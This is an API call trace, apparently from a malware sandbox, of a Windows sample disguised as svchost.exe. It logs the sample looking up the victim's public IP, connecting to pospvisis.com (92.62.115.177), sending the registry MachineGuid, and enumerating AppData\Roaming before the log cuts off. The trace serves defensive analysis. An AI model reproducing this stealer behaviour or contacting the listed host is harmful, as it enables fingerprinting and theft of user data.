strlen (_Str="C:\\Windows\\SysWOW64\\svchost.exe") returned 0x1f [0219.096] malloc (_Size=0x20) returned 0x911d8 [0219.096] _onexit (_Func=0x434e60) returned 0x434e60 [0219.101] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x77350000 [0219.101] GetProcAddress (hModule=0x77350000, lpProcName="CreateMutexA") returned 0x77364c6b [0219.101] GetProcAddress (hModule=0x77350000, lpProcName="GetLastError") returned 0x773611c0 [0219.101] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="serhershesrhsfesrf") returned 0x5c [0219.101] GetLastError () returned 0x0 [0219.102] GetUserDefaultLocaleName (in: lpLocaleName=0x27fb0e, cchLocaleName=85 | out: lpLocaleName="en-US") returned 6 [0219.105] GetProcessHeap () returned 0x2b0000 [0219.105] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2bf318 [0219.107] GetProcessHeap () returned 0x2b0000 [0219.107] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5) returned 0x2ca1c0 [0219.108] GetProcessHeap () returned 0x2b0000 [0219.108] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bf318 | out: hHeap=0x2b0000) returned 1 [0219.111] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77350000 [0219.111] LoadLibraryA (lpLibFileName="Urlmon.dll") returned 0x764b0000 [0219.127] GetProcAddress (hModule=0x764b0000, lpProcName="URLDownloadToFileA") returned 0x765468d0 [0219.129] GetProcessHeap () returned 0x2b0000 [0219.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2cb3b0 [0219.129] GetProcessHeap () returned 0x2b0000 [0219.129] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cb3b0, Size=0x14) returned 0x2ca1d0 [0219.129] GetProcessHeap () returned 0x2b0000 [0219.129] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ca1d0, Size=0x28) returned 0x2cd798 [0219.129] CreateDirectoryW (lpPathName="C:\\ProgramData" (normalized: "c:\\programdata"), lpSecurityAttributes=0x0) returned 0 [0219.130] GetLastError () returned 0xb7 [0219.130] GetProcessHeap () returned 0x2b0000 [0219.130] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd798 | out: hHeap=0x2b0000) returned 1 [0219.130] URLDownloadToFileA (param_1=0x0, param_2="http://api.ipify.org/?format=xml", param_3="C:\\ProgramData\\kaosdma.txt" (normalized: "c:\\programdata\\kaosdma.txt"), param_4=0x0, param_5=0x0) returned 0x0 [0219.609] GetProcessHeap () returned 0x2b0000 [0219.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2f5238 [0219.609] GetProcessHeap () returned 0x2b0000 [0219.609] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5238, Size=0x20) returned 0x2cfca8 [0219.609] GetProcessHeap () returned 0x2b0000 [0219.609] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfca8, Size=0x40) returned 0x2c7ab8 [0219.609] CreateFileW (lpFileName="C:\\ProgramData\\kaosdma.txt" (normalized: "c:\\programdata\\kaosdma.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0219.609] GetProcessHeap () returned 0x2b0000 [0219.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c7ab8 | out: hHeap=0x2b0000) returned 1 [0219.611] GetProcessHeap () returned 0x2b0000 [0219.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2cfca8 [0219.612] ReadFile (in: hFile=0xe0, lpBuffer=0x2cfca8, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x27e784, lpOverlapped=0x0 | out: lpBuffer=0x2cfca8*, lpNumberOfBytesRead=0x27e784*=0xc, lpOverlapped=0x0) returned 1 [0219.613] ReadFile (in: hFile=0xe0, lpBuffer=0x2cfcb4, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0x27e784, lpOverlapped=0x0 | out: lpBuffer=0x2cfcb4*, lpNumberOfBytesRead=0x27e784*=0x0, lpOverlapped=0x0) returned 1 [0219.614] CloseHandle (hObject=0xe0) returned 1 [0219.614] GetProcessHeap () returned 0x2b0000 [0219.614] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ca1c0 | out: hHeap=0x2b0000) returned 1 [0219.615] GetProcessHeap () returned 0x2b0000 [0219.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2f5238 [0219.615] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x27e49c | out: lpWSAData=0x27e49c) returned 0 [0219.615] GetProcessHeap () returned 0x2b0000 [0219.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f0890 [0219.616] GetProcessHeap () returned 0x2b0000 [0219.616] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0xc) returned 0x2f5250 [0219.616] GetProcessHeap () returned 0x2b0000 [0219.616] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5250, Size=0x18) returned 0x2cf0d0 [0219.616] GetProcessHeap () returned 0x2b0000 [0219.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2cf110 [0219.616] GetModuleHandleW (lpModuleName="kernel32") returned 0x77350000 [0219.616] GetProcAddress (hModule=0x77350000, lpProcName="AcquireSRWLockExclusive") returned 0x77ba29f1 [0219.616] GetProcessHeap () returned 0x2b0000 [0219.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf110 | out: hHeap=0x2b0000) returned 1 [0219.616] GetProcessHeap () returned 0x2b0000 [0219.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0d0 | out: hHeap=0x2b0000) returned 1 [0219.616] GetProcessHeap () returned 0x2b0000 [0219.616] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f0890 [0219.616] GetProcessHeap () returned 0x2b0000 [0219.617] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0xc) returned 0x2f5250 [0219.617] GetProcessHeap () returned 0x2b0000 [0219.617] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5250, Size=0x18) returned 0x2cf0d0 [0219.617] GetProcessHeap () returned 0x2b0000 [0219.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2cf110 [0219.617] GetModuleHandleW (lpModuleName="kernel32") returned 0x77350000 [0219.617] GetProcAddress (hModule=0x77350000, lpProcName="AcquireSRWLockExclusive") returned 0x77ba29f1 [0219.617] GetProcessHeap () returned 0x2b0000 [0219.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf110 | out: hHeap=0x2b0000) returned 1 [0219.617] GetProcessHeap () returned 0x2b0000 [0219.617] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0d0 | out: hHeap=0x2b0000) returned 1 [0219.617] GetProcessHeap () returned 0x2b0000 [0219.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2f5250 [0219.617] GetProcessHeap () returned 0x2b0000 [0219.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2cfcd0 [0219.617] GetProcessHeap () returned 0x2b0000 [0219.617] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f0890 [0219.617] GetProcessHeap () returned 0x2b0000 [0219.617] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0xc) returned 0x2f5268 [0219.617] GetProcessHeap () returned 0x2b0000 [0219.617] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5268, Size=0x18) returned 0x2cf0d0 [0219.617] GetProcessHeap () returned 0x2b0000 [0219.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2cf110 [0219.618] GetModuleHandleW (lpModuleName="kernel32") returned 0x77350000 [0219.618] GetProcAddress (hModule=0x77350000, lpProcName="ReleaseSRWLockExclusive") returned 0x77ba29ab [0219.618] GetProcessHeap () returned 0x2b0000 [0219.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf110 | out: hHeap=0x2b0000) returned 1 [0219.618] GetProcessHeap () returned 0x2b0000 [0219.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0d0 | out: hHeap=0x2b0000) returned 1 [0219.618] GetProcessHeap () returned 0x2b0000 [0219.618] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe) returned 0x2f5268 [0219.618] getaddrinfo (in: pNodeName="pospvisis.com", pServiceName=0x0, pHints=0x27e6f0*(ai_flags=0, ai_family=0, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x27e740 | out: ppResult=0x27e740*=0x2cfc80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2f5298*(sa_family=2, sin_port=0x0, sin_addr="92.62.115.177"), ai_next=0x0)) returned 0 [0219.882] GetProcessHeap () returned 0x2b0000 [0219.882] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5268 | out: hHeap=0x2b0000) returned 1 [0219.891] GetProcessHeap () returned 0x2b0000 [0219.891] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2f80c8 [0219.891] FreeAddrInfoW (pAddrInfo=0x2cfc80*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2f5298*(sa_family=2, sin_port=0x0, sin_addr="92.62.115.177"), ai_next=0x0)) [0219.891] WSASocketW (af=2, type=1, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x81) returned 0x300 [0219.892] connect (s=0x300, name=0x27e6b4*(sa_family=2, sin_port=0x50, sin_addr="92.62.115.177"), namelen=16) returned 0 [0220.000] GetProcessHeap () returned 0x2b0000 [0220.000] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f80c8 | out: hHeap=0x2b0000) returned 1 [0220.000] GetProcessHeap () returned 0x2b0000 [0220.000] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.000] GetProcessHeap () returned 0x2b0000 [0220.000] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2f5238 [0220.000] setsockopt (s=0x300, level=6, optname=1, optval="\x01R/", optlen=1) returned 0 [0220.001] ioctlsocket (in: s=0x300, cmd=-2147195266, argp=0x27e6f0 | out: argp=0x27e6f0) returned 0 [0220.001] recv (in: s=0x300, buf=0x27e780, len=2, flags=0 | out: buf=0x27e780*) returned 2 [0220.109] GetProcessHeap () returned 0x2b0000 [0220.109] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x27) returned 0x2dc458 [0220.109] recv (in: s=0x300, buf=0x2dc458, len=39, flags=0 | out: buf=0x2dc458*) returned 39 [0220.111] GetProcessHeap () returned 0x2b0000 [0220.111] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x15) returned 0x2cf0f0 [0220.113] GetProcessHeap () returned 0x2b0000 [0220.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2f5298 [0220.113] GetProcessHeap () returned 0x2b0000 [0220.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5298 | out: hHeap=0x2b0000) returned 1 [0220.113] GetProcessHeap () returned 0x2b0000 [0220.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5) returned 0x2f0890 [0220.113] GetProcessHeap () returned 0x2b0000 [0220.113] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2f5298 [0220.113] GetProcessHeap () returned 0x2b0000 [0220.113] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5298 | out: hHeap=0x2b0000) returned 1 [0220.115] GetProcessHeap () returned 0x2b0000 [0220.115] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1) returned 0x2f0870 [0220.115] GetProcessHeap () returned 0x2b0000 [0220.115] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0870 | out: hHeap=0x2b0000) returned 1 [0220.117] GetProcessHeap () returned 0x2b0000 [0220.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2f80c8 [0220.117] GetProcessHeap () returned 0x2b0000 [0220.117] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x15) returned 0x2ceff0 [0220.117] GetProcessHeap () returned 0x2b0000 [0220.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0870 [0220.118] GetProcessHeap () returned 0x2b0000 [0220.118] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0870, Size=0x10) returned 0x2f5298 [0220.118] GetProcessHeap () returned 0x2b0000 [0220.118] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5298, Size=0x20) returned 0x2f82a8 [0220.118] SetLastError (dwErrCode=0x0) [0220.118] GetEnvironmentVariableW (in: lpName="userprofile", lpBuffer=0x27e260, nSize=0x200 | out: lpBuffer="") returned 0x12 [0220.118] GetProcessHeap () returned 0x2b0000 [0220.118] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2cefd0 [0220.118] GetProcessHeap () returned 0x2b0000 [0220.118] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f82a8 | out: hHeap=0x2b0000) returned 1 [0220.119] GetProcessHeap () returned 0x2b0000 [0220.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2cf110 [0220.119] GetProcessHeap () returned 0x2b0000 [0220.119] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cf110, Size=0x24) returned 0x2dc428 [0220.119] GetProcessHeap () returned 0x2b0000 [0220.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0220.119] GetProcessHeap () returned 0x2b0000 [0220.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0220.119] GetProcessHeap () returned 0x2b0000 [0220.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f80c8 | out: hHeap=0x2b0000) returned 1 [0220.119] GetProcessHeap () returned 0x2b0000 [0220.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0f0 | out: hHeap=0x2b0000) returned 1 [0220.119] GetProcessHeap () returned 0x2b0000 [0220.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2f80c8 [0220.119] GetProcessHeap () returned 0x2b0000 [0220.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f80c8 | out: hHeap=0x2b0000) returned 1 [0220.119] GetProcessHeap () returned 0x2b0000 [0220.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2f3898 [0220.119] GetProcessHeap () returned 0x2b0000 [0220.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2f5298 [0220.119] GetProcessHeap () returned 0x2b0000 [0220.119] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5298 | out: hHeap=0x2b0000) returned 1 [0220.119] GetProcessHeap () returned 0x2b0000 [0220.119] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2f5298 [0220.119] send (s=0x300, buf=0x27e6b0*, len=8, flags=0) returned 8 [0220.120] GetProcessHeap () returned 0x2b0000 [0220.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2f5268 [0220.120] GetProcessHeap () returned 0x2b0000 [0220.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0870 [0220.120] GetProcessHeap () returned 0x2b0000 [0220.120] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0870, Size=0x14) returned 0x2cf0f0 [0220.122] GetProcessHeap () returned 0x2b0000 [0220.122] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0870 [0220.122] GetProcessHeap () returned 0x2b0000 [0220.122] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0870, Size=0x19) returned 0x2f80c8 [0220.122] send (s=0x300, buf=0x2f80c8*, len=12, flags=0) returned 12 [0220.123] send (s=0x300, buf=0x2f80d4*, len=13, flags=0) returned 13 [0220.123] GetProcessHeap () returned 0x2b0000 [0220.123] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f80c8 | out: hHeap=0x2b0000) returned 1 [0220.123] GetProcessHeap () returned 0x2b0000 [0220.123] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0f0 | out: hHeap=0x2b0000) returned 1 [0220.123] GetProcessHeap () returned 0x2b0000 [0220.123] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5268 | out: hHeap=0x2b0000) returned 1 [0220.123] GetProcessHeap () returned 0x2b0000 [0220.123] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5298 | out: hHeap=0x2b0000) returned 1 [0220.123] GetProcessHeap () returned 0x2b0000 [0220.123] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc458 | out: hHeap=0x2b0000) returned 1 [0220.124] GetProcessHeap () returned 0x2b0000 [0220.124] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.124] GetProcessHeap () returned 0x2b0000 [0220.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0870 [0220.124] GetProcessHeap () returned 0x2b0000 [0220.124] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0870, Size=0x10) returned 0x2f5238 [0220.124] GetProcessHeap () returned 0x2b0000 [0220.124] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0870 [0220.124] GetProcessHeap () returned 0x2b0000 [0220.124] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0870, Size=0x15) returned 0x2cf0f0 [0220.124] send (s=0x300, buf=0x2cf0f0*, len=10, flags=0) returned 10 [0220.124] send (s=0x300, buf=0x2cf0fa*, len=11, flags=0) returned 11 [0220.124] GetProcessHeap () returned 0x2b0000 [0220.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0f0 | out: hHeap=0x2b0000) returned 1 [0220.125] GetProcessHeap () returned 0x2b0000 [0220.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.125] GetProcessHeap () returned 0x2b0000 [0220.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfca8 | out: hHeap=0x2b0000) returned 1 [0220.125] GetProcessHeap () returned 0x2b0000 [0220.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2cf0f0 [0220.125] GetProcessHeap () returned 0x2b0000 [0220.125] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cf0f0, Size=0x24) returned 0x2dc458 [0220.125] GetProcessHeap () returned 0x2b0000 [0220.125] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x48) returned 0x2c69a0 [0220.125] GetProcessHeap () returned 0x2b0000 [0220.125] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c69a0, Size=0x40) returned 0x2c7908 [0220.125] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x101, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x304) returned 0x0 [0220.125] GetProcessHeap () returned 0x2b0000 [0220.125] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c7908 | out: hHeap=0x2b0000) returned 1 [0220.125] GetProcessHeap () returned 0x2b0000 [0220.125] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0870 [0220.125] GetProcessHeap () returned 0x2b0000 [0220.125] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0870, Size=0x10) returned 0x2f5238 [0220.125] GetProcessHeap () returned 0x2b0000 [0220.125] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5238, Size=0x20) returned 0x2cfca8 [0220.125] GetProcessHeap () returned 0x2b0000 [0220.126] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfca8, Size=0x18) returned 0x2cf0f0 [0220.126] RegQueryValueExW (in: hKey=0x304, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x4a) returned 0x0 [0220.126] GetProcessHeap () returned 0x2b0000 [0220.126] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0f0 | out: hHeap=0x2b0000) returned 1 [0220.126] GetProcessHeap () returned 0x2b0000 [0220.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2cf0f0 [0220.126] GetProcessHeap () returned 0x2b0000 [0220.126] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cf0f0, Size=0x24) returned 0x2dc458 [0220.126] RegCloseKey (hKey=0x304) returned 0x0 [0220.126] GetProcessHeap () returned 0x2b0000 [0220.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0870 [0220.126] GetProcessHeap () returned 0x2b0000 [0220.126] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0870, Size=0x28) returned 0x2dc4b8 [0220.126] GetProcessHeap () returned 0x2b0000 [0220.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0870 [0220.126] GetProcessHeap () returned 0x2b0000 [0220.126] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0870, Size=0x2d) returned 0x2ec3f0 [0220.126] send (s=0x300, buf=0x2ec3f0*, len=22, flags=0) returned 22 [0220.127] send (s=0x300, buf=0x2ec406*, len=23, flags=0) returned 23 [0220.127] GetProcessHeap () returned 0x2b0000 [0220.127] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec3f0 | out: hHeap=0x2b0000) returned 1 [0220.127] GetProcessHeap () returned 0x2b0000 [0220.127] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc4b8 | out: hHeap=0x2b0000) returned 1 [0220.127] GetProcessHeap () returned 0x2b0000 [0220.127] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc458 | out: hHeap=0x2b0000) returned 1 [0220.127] GetProcessHeap () returned 0x2b0000 [0220.127] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9) returned 0x2f5238 [0220.127] GetProcessHeap () returned 0x2b0000 [0220.127] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe) returned 0x2f5298 [0220.127] GetProcessHeap () returned 0x2b0000 [0220.127] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2cfca8 [0220.127] GetProcessHeap () returned 0x2b0000 [0220.127] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9) returned 0x2f5268 [0220.128] GetProcessHeap () returned 0x2b0000 [0220.128] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f0870 [0220.128] GetProcessHeap () returned 0x2b0000 [0220.128] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0870, Size=0xc) returned 0x2f5280 [0220.128] GetProcessHeap () returned 0x2b0000 [0220.128] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5280, Size=0x18) returned 0x2cf0f0 [0220.128] SetLastError (dwErrCode=0x0) [0220.128] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x27e3d0, nSize=0x200 | out: lpBuffer="") returned 0x22 [0220.128] GetProcessHeap () returned 0x2b0000 [0220.128] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.129] GetProcessHeap () returned 0x2b0000 [0220.129] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0f0 | out: hHeap=0x2b0000) returned 1 [0220.129] GetProcessHeap () returned 0x2b0000 [0220.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4b8 [0220.129] GetProcessHeap () returned 0x2b0000 [0220.129] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5268 | out: hHeap=0x2b0000) returned 1 [0220.129] GetProcessHeap () returned 0x2b0000 [0220.129] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc458 | out: hHeap=0x2b0000) returned 1 [0220.129] GetProcessHeap () returned 0x2b0000 [0220.129] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfca8 | out: hHeap=0x2b0000) returned 1 [0220.129] GetProcessHeap () returned 0x2b0000 [0220.129] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5238 | out: hHeap=0x2b0000) returned 1 [0220.129] GetProcessHeap () returned 0x2b0000 [0220.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfca8 [0220.129] GetProcessHeap () returned 0x2b0000 [0220.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.131] GetProcessHeap () returned 0x2b0000 [0220.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x14) returned 0x2cf0f0 [0220.131] GetProcessHeap () returned 0x2b0000 [0220.131] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cf0f0, Size=0x28) returned 0x2dc4e8 [0220.131] GetProcessHeap () returned 0x2b0000 [0220.131] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x50) returned 0x2f8fe0 [0220.132] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0x304 [0220.132] GetProcessHeap () returned 0x2b0000 [0220.132] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fe0 | out: hHeap=0x2b0000) returned 1 [0220.132] GetFileInformationByHandle (in: hFile=0x304, lpFileInformation=0x279c70 | out: lpFileInformation=0x279c70) returned 1 [0220.132] CloseHandle (hObject=0x304) returned 1 [0220.132] GetProcessHeap () returned 0x2b0000 [0220.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4e8 [0220.132] GetProcessHeap () returned 0x2b0000 [0220.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc518 [0220.132] GetProcessHeap () returned 0x2b0000 [0220.132] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc518, Size=0x44) returned 0x2c69a0 [0220.132] GetProcessHeap () returned 0x2b0000 [0220.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x14) returned 0x2cf0f0 [0220.132] GetProcessHeap () returned 0x2b0000 [0220.132] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cf0f0, Size=0x28) returned 0x2dc518 [0220.133] GetProcessHeap () returned 0x2b0000 [0220.133] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc518, Size=0x50) returned 0x2f8fe0 [0220.133] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\*", lpFindFileData=0x27cb60 | out: lpFindFileData=0x27cb60*(dwFileAttributes=0x2010, 